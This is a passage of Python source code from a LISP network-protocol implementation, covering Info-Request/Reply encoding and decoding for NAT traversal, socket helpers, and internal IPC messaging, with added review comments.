    "delegation-hole", "not-authoritative"]
#
# Info-Request/Reply
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=7 |R| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | EID mask-len | EID-prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Request specific information following the EID-prefix:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 0 | <Nothing Follows AFI=0> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Reply specific information following the EID-prefix:
#
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = 16387 | Rsvd1 | Flags |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Type = 7 | Rsvd2 | 4 + n |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# N | MS UDP Port Number | ETR UDP Port Number |
# A +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# T | AFI = x | Global ETR RLOC Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L | AFI = x | MS RLOC Address ... |
# C +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# A | AFI = x | Private ETR RLOC Address ... |
# F +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address 1 ... |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address n ... |
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# This encoding will not use authentication so we respond to anyone who
# sends an Info-Request. And the EID-prefix will have AFI=0.
#
class lisp_info():
    """
    LISP Info-Request/Info-Reply message (type 7), used for NAT
    traversal. This implementation does not use authentication, so it
    responds to any Info-Request, and the EID-prefix is always encoded
    with AFI=0. See the packet diagrams above.
    """
    def __init__(self):
        self.info_reply = False    # False => Info-Request, truthy => Reply
        self.nonce = 0
        self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.ms_port = 0
        self.etr_port = 0
        self.rtr_list = []         # list of lisp_address() RTR RLOCs
        self.hostname = lisp_hostname
    #enddef
    def print_info(self):
        """
        Log a one-line summary of this Info-Request or Info-Reply.
        """
        if (self.info_reply):
            req_or_reply = "Info-Reply"
            rloc = (", ms-port: {}, etr-port: {}, global-rloc: {}, " + \
                "ms-rloc: {}, private-rloc: {}, RTR-list: ").format( \
                self.ms_port, self.etr_port,
                red(self.global_etr_rloc.print_address_no_iid(), False),
                red(self.global_ms_rloc.print_address_no_iid(), False),
                red(self.private_etr_rloc.print_address_no_iid(), False))
            if (len(self.rtr_list) == 0): rloc += "empty, "
            for rtr in self.rtr_list:
                rloc += red(rtr.print_address_no_iid(), False) + ", "
            #endfor
            # Strip the trailing ", " left by the loop (or "empty, ").
            rloc = rloc[0:-2]
        else:
            req_or_reply = "Info-Request"
            hostname = "<none>" if self.hostname == None else self.hostname
            rloc = ", hostname: {}".format(blue(hostname, False))
        #endif
        lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
            lisp_hex_string(self.nonce), rloc))
    #enddef
    def encode(self):
        """
        Return the packed Info-Request or Info-Reply message.
        """
        first_long = (LISP_NAT_INFO << 28)
        if (self.info_reply): first_long |= (1 << 27)
        #
        # Encode first-long, nonce, key-id longword, TTL and EID mask-len/
        # EID-prefix AFI. There is no auth data field since auth len is 0.
        #
        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("Q", self.nonce)
        packet += struct.pack("III", 0, 0, 0)
        #
        # Add hostname null terminated string with AFI 17,
        #
        if (self.info_reply == False):
            if (self.hostname == None):
                packet += struct.pack("H", 0)
            else:
                packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
                packet += self.hostname + "\0"
            #endif
            return(packet)
        #endif
        #
        # If Info-Reply, encode Type 7 LCAF.
        #
        afi = socket.htons(LISP_AFI_LCAF)
        lcaf_type = LISP_LCAF_NAT_TYPE
        lcaf_len = socket.htons(16)
        ms_port = socket.htons(self.ms_port)
        etr_port = socket.htons(self.etr_port)
        packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
            ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
        packet += self.global_etr_rloc.pack_address()
        # The MS RLOC slot is encoded with AFI 0 (empty) here.
        packet += struct.pack("HH", 0, socket.htons(self.private_etr_rloc.afi))
        packet += self.private_etr_rloc.pack_address()
        if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)
        #
        # Encode RTR list.
        #
        for rtr in self.rtr_list:
            packet += struct.pack("H", socket.htons(rtr.afi))
            packet += rtr.pack_address()
        #endfor
        return(packet)
    #enddef
    def decode(self, packet):
        """
        Decode an Info-Request or Info-Reply into this object. Returns
        the original (unconsumed) packet buffer on success, or None on
        a malformed/unsupported message.
        """
        orig_packet = packet
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)
        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = first_long[0]
        packet = packet[format_size::]
        packet_format = "Q"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)
        nonce = struct.unpack(packet_format, packet[:format_size])
        first_long = socket.ntohl(first_long)
        self.nonce = nonce[0]
        # Reply bit; kept as a truthy int rather than a bool.
        self.info_reply = first_long & 0x08000000
        self.hostname = None
        packet = packet[format_size::]
        #
        # Parse key-id, auth-len, auth-data, and EID-record. We don't support
        # any of these. On encode, we set 3 longs worth of 0.
        #
        packet_format = "HH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)
        #
        # If an LCAF value appears in the key-id field, then this is an
        # old style Echo-Reply (that NX-OS implemented).
        #
        key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
        if (auth_len != 0): return(None)
        packet = packet[format_size::]
        packet_format = "IBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)
        ttl, rsvd, ml, eid_afi = struct.unpack(packet_format,
            packet[:format_size])
        # Only AFI=0 EID-prefixes are supported (see class docstring).
        if (eid_afi != 0): return(None)
        packet = packet[format_size::]
        #
        # Check if name supplied.
        #
        if (self.info_reply == False):
            packet_format = "H"
            format_size = struct.calcsize(packet_format)
            if (len(packet) >= format_size):
                afi = struct.unpack(packet_format, packet[:format_size])[0]
                if (socket.ntohs(afi) == LISP_AFI_NAME):
                    packet = packet[format_size::]
                    packet, self.hostname = lisp_decode_dist_name(packet)
                #endif
            #endif
            return(orig_packet)
        #endif
        #
        # Process Info-Reply.
        #
        packet_format = "HHBBHHH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)
        afi, x, lcaf_type, rsvd, lcaf_len, ms_port, etr_port = \
            struct.unpack(packet_format, packet[:format_size])
        if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)
        self.ms_port = socket.ntohs(ms_port)
        self.etr_port = socket.ntohs(etr_port)
        packet = packet[format_size::]
        #
        # Get addresses one AFI at a time.
        #
        packet_format = "H"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)
        #
        # Get global ETR RLOC address.
        #
        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (afi != 0):
            self.global_etr_rloc.afi = socket.ntohs(afi)
            packet = self.global_etr_rloc.unpack_address(packet)
            if (packet == None): return(None)
            self.global_etr_rloc.mask_len = \
                self.global_etr_rloc.host_mask_len()
        #endif
        #
        # Get global MS RLOC address. From here on a truncated packet is
        # tolerated: return what was parsed so far via orig_packet.
        #
        if (len(packet) < format_size): return(orig_packet)
        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (afi != 0):
            self.global_ms_rloc.afi = socket.ntohs(afi)
            packet = self.global_ms_rloc.unpack_address(packet)
            if (packet == None): return(orig_packet)
            self.global_ms_rloc.mask_len = self.global_ms_rloc.host_mask_len()
        #endif
        #
        # Get private ETR RLOC address.
        #
        if (len(packet) < format_size): return(orig_packet)
        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (afi != 0):
            self.private_etr_rloc.afi = socket.ntohs(afi)
            packet = self.private_etr_rloc.unpack_address(packet)
            if (packet == None): return(orig_packet)
            self.private_etr_rloc.mask_len = \
                self.private_etr_rloc.host_mask_len()
        #endif
        #
        # Get RTR list if any.
        #
        while (len(packet) >= format_size):
            afi = struct.unpack(packet_format, packet[:format_size])[0]
            packet = packet[format_size::]
            if (afi == 0): continue
            rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
            packet = rtr.unpack_address(packet)
            if (packet == None): return(orig_packet)
            rtr.mask_len = rtr.host_mask_len()
            self.rtr_list.append(rtr)
        #endwhile
        return(orig_packet)
    #enddef
#endclass
class lisp_nat_info():
    """
    Remembers the translated address/port an Info-Request arrived from,
    so a NATed xTR can be reached at its public (translated) RLOC.
    """
    def __init__(self, addr_str, hostname, port):
        self.address = addr_str
        self.hostname = hostname
        self.port = port
        self.uptime = lisp_get_timestamp()
    #enddef
    def timed_out(self):
        #
        # An entry goes stale after two Info-Request periods without a
        # refresh.
        #
        idle = time.time() - self.uptime
        return(idle >= (LISP_INFO_INTERVAL * 2))
    #enddef
#endclass
class lisp_info_source():
    """
    The source of a received Info-Request: its RLOC, source UDP port,
    and hostname. Instances are indexed by address+hostname and by
    nonce in the module-level caches.
    """
    def __init__(self, hostname, addr_str, port):
        self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
        self.port = port
        self.uptime = lisp_get_timestamp()
        self.nonce = None
        self.hostname = hostname
        self.no_timeout = False
    #enddef
    def cache_address_for_info_source(self):
        #
        # Key on address plus hostname so multiple xTRs behind the same
        # NAT (same translated address) stay distinct.
        #
        cache_key = self.address.print_address_no_iid() + self.hostname
        lisp_info_sources_by_address[cache_key] = self
    #enddef
    def cache_nonce_for_info_source(self, nonce):
        self.nonce = nonce
        lisp_info_sources_by_nonce[nonce] = self
    #enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_concat_auth_data
#
# Take each longword and convert to binascii by byte-swapping and zero filling
# longword that leads with 0.
#
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
    """
    Concatenate authentication-data longwords into a single hex string.
    On little-endian (x86) systems the values are byte-swapped first;
    each hex word is zero-filled on the left when its leading nibbles
    are 0.
    """
    def hexfill(value, width):
        # Hex-encode one longword and left-pad with zeros to 'width'.
        return(lisp_hex_string(value).zfill(width))
    #enddef

    if (lisp_is_x86()):
        if (auth1 != ""): auth1 = byte_swap_64(auth1)
        if (auth2 != ""): auth2 = byte_swap_64(auth2)
        if (auth3 != ""):
            #
            # For SHA-1-96 the third word is only 32 bits wide.
            #
            if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
            else: auth3 = byte_swap_64(auth3)
        #endif
        if (auth4 != ""): auth4 = byte_swap_64(auth4)
    #endif

    if (alg_id == LISP_SHA_1_96_ALG_ID):
        auth_data = hexfill(auth1, 16) + hexfill(auth2, 16) + hexfill(auth3, 8)
    #endif
    if (alg_id == LISP_SHA_256_128_ALG_ID):
        auth_data = (hexfill(auth1, 16) + hexfill(auth2, 16) +
            hexfill(auth3, 16) + hexfill(auth4, 16))
    #endif
    return(auth_data)
#enddef
#
# lisp_open_listen_socket
#
# Open either internal socket or network socket. If network socket, it will
# open it with a local address of 0::0 which means the one socket can be
# used for IPv4 or IPv6. This is goodness and reduces the number of threads
# required.
#
def lisp_open_listen_socket(local_addr, port):
    """
    Open a listen socket. If 'port' is numeric, open a UDP network
    socket bound to (local_addr, port); "." in local_addr selects IPv4
    and ":" selects IPv6. Otherwise 'port' names an AF_UNIX datagram
    socket path used for intra-process IPC. Returns the bound socket,
    or None when an IPv6 socket is requested on Raspbian (no IPv6
    support there).
    """
    if (port.isdigit()):
        if (local_addr.find(".") != -1):
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        #endif
        if (local_addr.find(":") != -1):
            if (lisp_is_raspbian()): return(None)
            sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
        #endif
        # NOTE(review): if local_addr contains neither "." nor ":",
        # 'sock' is unbound here and bind() raises UnboundLocalError —
        # callers presumably always pass a valid address; confirm.
        sock.bind((local_addr, int(port)))
    else:
        name = port
        if (os.path.exists(name)):
            # Remove a stale socket file left by a previous run before
            # re-binding.
            os.system("rm " + name)
            time.sleep(1)
        #endif
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
        sock.bind(name)
    #endif
    return(sock)
#enddef
#
# lisp_open_send_socket
#
# Open socket for sending to port 4342.
#
def lisp_open_send_socket(internal_name, afi):
    """
    Open a socket for sending to UDP port 4342. When internal_name is
    "", open an unbound UDP socket of the given address-family;
    otherwise open and bind an AF_UNIX datagram socket of that name.
    Returns None for IPv6 on Raspbian (no IPv6 support there).
    """
    if (internal_name == ""):
        if (afi == LISP_AFI_IPV4):
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        #endif
        if (afi == LISP_AFI_IPV6):
            if (lisp_is_raspbian()): return(None)
            sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
        #endif
        # NOTE(review): an 'afi' that is neither IPv4 nor IPv6 leaves
        # 'sock' unbound and the return raises UnboundLocalError —
        # presumably callers only pass the two supported AFIs; confirm.
    else:
        # Remove a stale socket file before binding.
        if (os.path.exists(internal_name)): os.system("rm " + internal_name)
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
        sock.bind(internal_name)
    #endif
    return(sock)
#enddef
#
# lisp_close_socket
#
# Close network and internal sockets.
#
def lisp_close_socket(sock, internal_name):
    """
    Close a network or internal socket; for internal sockets also
    remove the AF_UNIX socket file if it exists.
    """
    sock.close()
    if (os.path.exists(internal_name)):
        os.system("rm " + internal_name)
    #endif
    return
#enddef
#
# lisp_is_running
#
# Test if one of "lisp-itr", "lisp-etr", "lisp-mr", "lisp-ms", "lisp-ddt", or
# "lisp-core" is running.
#
def lisp_is_running(node):
    """
    Return True if the named LISP component ("lisp-itr", "lisp-etr",
    "lisp-mr", "lisp-ms", "lisp-ddt", or "lisp-core") is running,
    detected by the existence of its AF_UNIX socket path.
    """
    # os.path.exists() already returns a bool; the previous
    # "True if ... else False" wrapper was redundant.
    return(os.path.exists(node))
#enddef
#
# lisp_packet_ipc
#
# Build IPC message for a LISP control packet destined for UDP port 4342. This
# packet goes to the lisp-core process and then it IPCs it to the appropriate
# LISP component process.
#
def lisp_packet_ipc(packet, source, sport):
    """
    Build the "packet@" IPC message used to hand a LISP control packet
    (UDP port 4342) from the lisp-core process to a component process.
    """
    return("packet@{}@{}@{}@{}".format(len(packet), source, sport, packet))
#enddef
#
# lisp_control_packet_ipc
#
# Build IPC message for a packet that needs to be source from UDP port 4342.
# Always sent by a LISP component process to the lisp-core process.
#
def lisp_control_packet_ipc(packet, source, dest, dport):
    """
    Build the IPC message for a packet that must be sourced from UDP
    port 4342. Always sent by a component process to lisp-core. Note
    'source' is accepted but not encoded in the message.
    """
    return("control-packet@{}@{}@{}".format(dest, dport, packet))
#enddef
#
# lisp_data_packet_ipc
#
# Build IPC message for a MAC, IPv4, or IPv6 data packet.
#
def lisp_data_packet_ipc(packet, source):
    """
    Build the IPC message for a MAC, IPv4, or IPv6 data packet. The
    double "@" encodes a null port field.
    """
    return("data-packet@{}@{}@@{}".format(len(packet), source, packet))
#enddef
#
# lisp_command_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_command_ipc(packet, source):
    """
    Build the IPC message for a command. It carries the same number of
    "@"-separated fields as the "packet@" IPC, with an intentional
    double "@" after the source to indicate a null port.
    """
    return("command@{}@{}@@{}".format(len(packet), source, packet))
#enddef
#
# lisp_api_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_api_ipc(source, data):
    """
    Build the IPC message for an API request. Same field layout as the
    "packet@" IPC, with a double "@" after the source for the null
    port.
    """
    return("api@{}@{}@@{}".format(len(data), source, data))
#enddef
#
# lisp_ipc
#
# Send IPC message to internal AF_UNIX socket if LISP component is running. We
# need to send in 15000 byte segments since the socket interface will not allow
# to support more. And socket.setsockopt() won't allow increasing SO_SNDBUF.
#
def lisp_ipc(packet, send_socket, node):
    """
    Send an IPC message to a LISP component's AF_UNIX socket in
    segments, since the socket layer bounds datagram sizes (and
    setsockopt() will not allow raising SO_SNDBUF). Control packets use
    9000-byte segments, everything else 1500. Failed sends are retried
    with exponential backoff, giving up after 12 consecutive failures.
    """
    #
    # Can't send an IPC message to a process that is not running.
    #
    if (lisp_is_running(node) == False):
        lprint("Suppress sending IPC to {}".format(node))
        return
    #endif

    ipc_len = 1500 if (packet.find("control-packet") == -1) else 9000
    offset = 0
    length = len(packet)
    retry_count = 0
    sleep_time = .001
    while (length > 0):
        segment_len = min(length, ipc_len)
        segment = packet[offset:segment_len+offset]
        try:
            send_socket.sendto(segment, node)
            lprint("Send IPC {}-out-of-{} byte to {} succeeded".format( \
                len(segment), len(packet), node))
            retry_count = 0
            sleep_time = .001
        except socket.error as e:
            #
            # "except ... as e" replaces the old "except ..., e" syntax,
            # which Python 3 removed; "as" also works on Python 2.6+.
            #
            if (retry_count == 12):
                lprint("Giving up on {}, consider it down".format(node))
                break
            #endif
            lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format( \
                len(segment), len(packet), node, e))
            retry_count += 1
            time.sleep(sleep_time)
            lprint("Retrying after {} ms ...".format(sleep_time * 1000))
            sleep_time *= 2
            continue
        #endtry
        offset += segment_len
        length -= segment_len
    #endwhile
    return
#enddef
#
# lisp_format_packet
#
# Put a whitespace between every 4 bytes of a packet dump.
#
def lisp_format_packet(packet):
    """
    Return a hex dump of 'packet' with a space after every 4 bytes
    (8 hex digits) for readability in log messages.
    """
    packet = binascii.hexlify(packet)
    # On Python 3 hexlify() returns bytes; on Python 2 it is already str.
    if (type(packet) != str): packet = packet.decode()

    #
    # The previous loop sized itself as len() * 2 of the already
    # hexlified string and shrank the bound by 4 per pass, so it kept
    # iterating past the end of the data appending empty slices (i.e.
    # spurious trailing spaces). Chunk the hex string directly instead.
    #
    new = ""
    for offset in range(0, len(packet), 8):
        new += packet[offset:offset+8] + " "
    #endfor
    return(new)
#enddef
#
# lisp_send
#
# Send packet out.
#
def lisp_send(lisp_sockets, dest, port, packet):
    """
    Send a LISP control packet to 'dest' on 'port', choosing the IPv4
    or IPv6 socket from 'lisp_sockets'. RLOC-probe Map-Requests and
    Map-Replies (first byte 0x12 or 0x28) are sent with TTL 255 so the
    receiver can validate the hop count; the TTL is restored to 64
    afterwards.
    """
    lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]
    #
    # Remove square brackets. Use an IPv4 socket when address is IPv4, even
    # when embedded in ::ffff:<ipv4-address>. This is a special case when
    # an RTR sits behind a NAT and is sending a Map-Request. The ECM and
    # Map-Request need to use the same ephemeral port and the Map-Reply
    # needs to come to the ephemeral listening socket lisp_sockets[0];
    #
    # Also, on getchip and raspberry-pi OSes, there is no support for IPv6
    # sockets, so we need to use the IPv4 embedded address and the IPv4
    # socket.
    #
    address = dest.print_address_no_iid()
    if (address.find("::ffff:") != -1 and address.count(".") == 3):
        if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
        if (lisp_socket == None):
            lisp_socket = lisp_sockets[0]
            address = address.split("::ffff:")[-1]
        #endif
    #endif
    lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
        len(packet), bold("to " + address, False), port,
        lisp_format_packet(packet)))
    #
    # If Map-Request/Reply RLOC-probe set TTL for outgoing packet to 255.
    #
    set_ttl = (LISP_RLOC_PROBE_TTL == 255)
    if (set_ttl):
        lisp_type = struct.unpack("B", packet[0])[0]
        set_ttl = (lisp_type in [0x12, 0x28])
        if (set_ttl): lisp_set_ttl(lisp_socket, LISP_RLOC_PROBE_TTL)
    #endif
    try: lisp_socket.sendto(packet, (address, port))
    except socket.error as e:
        #
        # "except ... as e" replaces the Python-2-only "except ..., e"
        # syntax; "as" works on Python 2.6+ and Python 3.
        #
        lprint("socket.sendto() failed: {}".format(e))
    #endtry
    #
    # Set back to default TTL.
    #
    if (set_ttl): lisp_set_ttl(lisp_socket, 64)
    return
#enddef
#
# lisp_receive_segments
#
# Process 1500 byte segments if received IPC packet greater than what sockets
# can support.
#
def lisp_receive_segments(lisp_socket, packet, source, total_length):
    """
    Reassemble an internal IPC message that was sent in segments.
    'packet' is the first segment already read; keep reading from
    'lisp_socket' until 'total_length' bytes have arrived. Returns
    [True, packet] when the message is complete, [False, None] on a
    socket error, or [False, new-segment] when a fresh "packet@"
    message interrupts the old one (the sender gave up and restarted).
    """
    #
    # If the total length is equal to the segment length. We only have one
    # segment which is the packet. Return it.
    #
    segment_len = total_length - len(packet)
    if (segment_len == 0): return([True, packet])
    lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
        total_length, source))
    #
    # Otherwise, receive each segment and assemble it to return entire packet
    # to caller.
    #
    length = segment_len
    while (length > 0):
        try: segment = lisp_socket.recvfrom(9000)
        except: return([False, None])
        segment = segment[0]
        #
        # The sender gave up and sent a new message that made it to us, last
        # partial packet must be dropped.
        #
        if (segment.find("packet@") == 0):
            seg = segment.split("@")
            # NOTE(review): this lprint() is handed format args
            # positionally rather than via .format(); relies on lprint()
            # accepting *args — confirm against lprint()'s definition.
            lprint("Received new message ({}-out-of-{}) while receiving " + \
                "fragments, old message discarded", len(segment),
                seg[1] if len(seg) > 2 else "?")
            return([False, segment])
        #endif
        length -= len(segment)
        packet += segment
        lprint("Received {}-out-of-{} byte segment from {}".format( \
            len(segment), total_length, source))
    #endwhile
    return([True, packet])
#enddef
#
# lisp_bit_stuff
#
# For every element in the array, insert a 0x40 ("@"). This is a bit-stuffing
# procedure. Only look at array elements with index 2 and above.
#
def lisp_bit_stuff(payload):
    """
    Re-join IPC message fields with 0x40 ("@") bytes. Used when the
    payload itself contained "@" and split() broke it apart; joining
    the pieces back with "@" restores the original data.
    """
    lprint("Bit-stuffing, found {} segments".format(len(payload)))
    return("\x40".join(payload))
#enddef
#
# lisp_receive
#
# Wait for packet to come in. This function call will block. For command
# IPCs, we need to loop to assemble all segments.
#
# For an internal socket, the format of a recvfrom() 'packet-data' is:
#
# "command" @ <total-length> @ <source> @ <packet-buffer>
# "packet" @ <total-length> @ <source> @ <command-buffer>
#
# So when an array of length 4 does not exist, we are receiving a fragment.
#
# For an external network socket, the format of a recvfrom() is:
#
# packet_data[0] = <packet-buffer>
# packet_data[1] = [<source>, <port>]
#
def lisp_receive(lisp_socket, internal):
    """
    Block until a message arrives on 'lisp_socket' and return
    [opcode, source, port, packet]. For a network socket
    (internal == False) the opcode is always "packet". For internal
    AF_UNIX sockets, the "@"-separated IPC header is parsed and
    multi-segment messages are reassembled first. Returns
    ["", "", "", ""] on a socket error.
    """
    while (True):
        #
        # Read from socket. Return if we received an error.
        #
        try: packet_data = lisp_socket.recvfrom(9000)
        except: return(["", "", "", ""])
        #
        # This is a packet received on the network. If it was fragmented at
        # the sender, then IP did it so it is assembled into a complete
        # datagram in this system.
        #
        if (internal == False):
            packet = packet_data[0]
            source = lisp_convert_6to4(packet_data[1][0])
            port = packet_data[1][1]
            if (port == LISP_DATA_PORT):
                # Data packets are only logged when data-plane logging is
                # on, and then only the first 60 bytes.
                do_log = lisp_data_plane_logging
                packet_str = lisp_format_packet(packet[0:60]) + " ..."
            else:
                do_log = True
                packet_str = lisp_format_packet(packet)
            #endif
            if (do_log):
                lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
                    False), len(packet), bold("from " + source, False), port,
                    packet_str))
            #endif
            return(["packet", source, port, packet])
        #endif
        #
        # This is an IPC message that can be fragmented by lisp-core or the
        # sending socket interface.
        #
        assembled = False
        data = packet_data[0]
        loop = False
        while (assembled == False):
            data = data.split("@")
            if (len(data) < 4):
                # NOTE(review): lprint() here gets format args
                # positionally (no .format()); relies on lprint(*args) —
                # confirm against lprint()'s definition.
                lprint("Possible fragment (length {}), from old message, " + \
                    "discarding", len(data[0]))
                loop = True
                break
            #endif
            opcode = data[0]
            try:
                total_length = int(data[1])
            except:
                error_str = bold("Internal packet reassembly error", False)
                lprint("{}: {}".format(error_str, packet_data))
                loop = True
                break
            #endtry
            source = data[2]
            port = data[3]
            #
            # If any of the data payload has a 0x40 byte (which is "@" in
            # ascii), we will confuse the IPC separator from real data.
            # So go to the payload and put in 0x40 where split() separated
            # the data. This particularly happens with Map-Notify messages
            # since the first byte of the message is 0x40.
            #
            if (len(data) > 5):
                packet = lisp_bit_stuff(data[4::])
            else:
                packet = data[4]
            #endif
            #
            # Check for reassembly. Once reassembled, then we can process one
            # large packet.
            #
            assembled, packet = lisp_receive_segments(lisp_socket, packet,
                source, total_length)
            if (packet == None): return(["", "", "", ""])
            #
            # We did not finish assembling a message but the sender sent a new
            # one.
            #
            if (assembled == False):
                data = packet
                continue
            #endif
            if (port == ""): port = "no-port"
            if (opcode == "command" and lisp_i_am_core == False):
                # Log only the command name, not any appended JSON body.
                index = packet.find(" {")
                command = packet if index == -1 else packet[:index]
                command = ": '" + command + "'"
            else:
                command = ""
            #endif
            lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
                len(packet), bold("from " + source, False), port, opcode,
                command if (opcode in ["command", "api"]) else ": ... " if \
                (opcode == "data-packet") else \
                ": " + lisp_format_packet(packet)))
        #endif
        #endwhile
        if (loop): continue
        return([opcode, source, port, packet])
    #endwhile
#enddef
#
# lisp_parse_packet
#
# Parse LISP control message.
#
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
    """
    Parse a LISP control message header and dispatch the packet to the
    handler for its type. 'source' is either an address string or an
    IPC process name beginning with "lisp". Returns the trigger flag
    from lisp_process_info_reply() when the packet is an Info-Reply,
    otherwise False.
    """
    trigger_flag = False
    header = lisp_control_header()
    if (header.decode(packet) == None):
        lprint("Could not decode control header")
        return(trigger_flag)
    #endif
    #
    # Store source in internal lisp_address() format.
    #
    from_ipc = source
    if (source.find("lisp") == -1):
        s = lisp_address(LISP_AFI_NONE, "", 0, 0)
        s.string_to_afi(source)
        s.store_address(source)
        source = s
    #endif
    if (header.type == LISP_MAP_REQUEST):
        lisp_process_map_request(lisp_sockets, packet, None, 0, source,
            udp_sport, False, ttl)
    elif (header.type == LISP_MAP_REPLY):
        lisp_process_map_reply(lisp_sockets, packet, source, ttl)
    elif (header.type == LISP_MAP_REGISTER):
        lisp_process_map_register(lisp_sockets, packet, source, udp_sport)
    elif (header.type == LISP_MAP_NOTIFY):
        #
        # A Map-Notify from the lisp-etr process is a multicast one; an
        # RTR handles both the multicast and regular cases.
        #
        if (from_ipc == "lisp-etr"):
            lisp_process_multicast_map_notify(packet, source)
        else:
            if (lisp_is_running("lisp-rtr")):
                lisp_process_multicast_map_notify(packet, source)
            #endif
            lisp_process_map_notify(lisp_sockets, packet, source)
        #endif
    elif (header.type == LISP_MAP_NOTIFY_ACK):
        lisp_process_map_notify_ack(packet, source)
    elif (header.type == LISP_MAP_REFERRAL):
        lisp_process_map_referral(lisp_sockets, packet, source)
    elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
        x, y, trigger_flag = lisp_process_info_reply(source, packet, True)
